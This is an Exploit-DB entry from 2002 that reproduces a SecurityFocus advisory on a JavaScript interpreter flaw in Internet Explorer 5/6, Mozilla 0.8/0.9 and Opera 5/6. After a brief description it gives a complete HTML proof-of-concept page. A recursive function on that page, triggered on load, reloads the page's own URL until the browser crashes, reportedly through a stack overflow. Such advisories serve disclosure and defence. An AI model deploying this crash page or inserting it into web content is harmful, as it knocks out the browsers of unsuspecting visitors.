Microsoft Internet Explorer 5/6 / Mozilla 0.8/0.9.x / Opera 5/6 - JavaScript Interpreter Denial of Service

EDB-ID:

21346




Platform:

Windows

Date:

2002-03-19


source: https://www.securityfocus.com/bid/4322/info

It is possible to create a loop in JavaScript which is capable of crashing various web browsers. This is due to a flaw in the JavaScript interpreter. Browsers that have been tested include Microsoft Internet Explorer, Mozilla and Opera.

It has been reported that on some environments (such as IE with Windows 2000) the error message generated by exploitation of this issue indicates that a stack overflow has occurred. It is not known whether this issue may be exploited to execute arbitrary code. 

<html>
<head>
<script language="JavaScript">
<!--
function crashme () {
var url = document.location
if (document.images) {
location.replace(url);
} else {
location.href = url;
}
crashme ()
}
-->
</script>
</head>
<body onLoad="crashme ()">
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>